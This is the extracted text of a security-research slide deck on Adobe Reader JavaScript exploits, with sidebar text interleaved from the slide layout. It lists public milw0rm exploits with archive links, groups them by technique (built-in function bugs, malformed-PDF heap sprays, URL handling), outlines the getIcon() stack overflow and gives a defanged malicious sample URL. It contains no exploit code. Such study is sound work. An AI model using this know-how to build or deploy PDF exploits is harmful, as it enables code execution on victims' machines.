  • 7. Contents Adobe JS Z Chen . About Adobe Javascript . . About Adobe Javascript 1 Exploits Overview Try It Out! . Samples In the . . Exploits Overview 2 Wild . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 7
  • 8. Adobe PDF Exploit List Adobe JS Z Chen . Exlpoits List from Milw0rm . About Adobe Javascript .. Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Ex- Exploits Overview ploit Try It Out! Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit Samples In the Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit Wild Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500 Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit Adobe Acrobat Reader <= 8.1.2 Malformed PDF Remote DOS PoC Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vulnerability . Adobe Reader 7.0.8.0 AcroPDF.dll Internet Explorer Denial of Service .. . . JoYAN 8
  • 9. Leveragine Type I Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Play with the bugs when invoking a built-in function/method Wild within the Javascript context. Easy to trigger and exploit. JoYAN 9
  • 10. Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Wild http://milw0rm.com/exploits/8570 JoYAN 10
  • 11. Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Wild http://milw0rm.com/exploits/8569 Not a stack overflow? JoYAN 11
  • 12. Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Wild http://milw0rm.com/exploits/7006 http://milw0rm.com/exploits/6994 JoYAN 12
  • 13. Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit Adobe JS Z Chen . http://milw0rm.com/exploits/8595 . About Adobe .. Javascript Affected Version : Acrobat Reader 8.1.2 - 9.0 Exploits Overview Tested On : XP SP2 / SP3 Try It Out! Description : This vulnerability allows remote attackers to Samples In the Wild execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a mali- cious file.The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supply- ing a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow. . Failed to uncompress it :(. .. . JoYAN . 13
  • 14. Leveragine Type II Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Wild Play with the bugs when parsering a malformed pdf file. Only use the javascript to perform a heapspray. JoYAN 14
  • 15. Adobe Acrobat Reader JBIG2 Local Buffer Overflow Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.h Wild http://milw0rm.com/exploits/8099 http://milw0rm.com/exploits/8280 JoYAN 15
  • 16. Leveragine Type III Adobe JS Z Chen . About Adobe Play with the urls. . Javascript Exploits I don’t know whether it works in the browser context or pdf reader Overview context.. Try It Out! Samples In the Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Wild Consumption:http://milw0rm.com/exploits/3430 Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vul- nerability:http://milw0rm.com/exploits/3084 Adobe Reader 7.0.8.0 AcroPDF.dll Internet Explorer Denial of Service:http://milw0rm.com/exploits/3040 Adobe Acrobat 9 ActiveX Remote Denial of Service Ex- . ploit:http://milw0rm.com/exploits/6424 .. . . JoYAN 16
  • 17. To be continued... Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! . Those I can’t RE them: . Samples In the .. Wild . .. 1 Adobe Acrobat Reader <= 8.1.2 Reader Remote Denial Of . Service:http://milw0rm.com/exploits/5687, Overflow? .. . . JoYAN 17
  • 18. Contents Adobe JS Z Chen . About Adobe Javascript . . About Adobe Javascript 1 Exploits Overview Try It Out! . Samples In the . . Exploits Overview 2 Wild . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 18
  • 19. Try it out! Adobe JS Z Chen About Adobe Javascript Exploits Overview . Try It Out! Adobe Reader util.printf() JavaScript Function Stack Over-. Samples In the Wild flow Exploit .. http://milw0rm.com/exploits/7006 . http://milw0rm.com/exploits/6994 .. . . JoYAN 19
  • 20. Contents Adobe JS Z Chen . About Adobe Javascript . . About Adobe Javascript 1 Exploits Overview Try It Out! . Samples In the . . Exploits Overview 2 Wild . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 20
  • 21. Sample in the wild Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! . Samples In the 50.2 . Wild .. hxxp://172.31.25.229/acroPDF.htm . .. . . JoYAN 21
  • 22. Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! . Samples In the Wild .. Thank you ! . .. . . JoYAN 22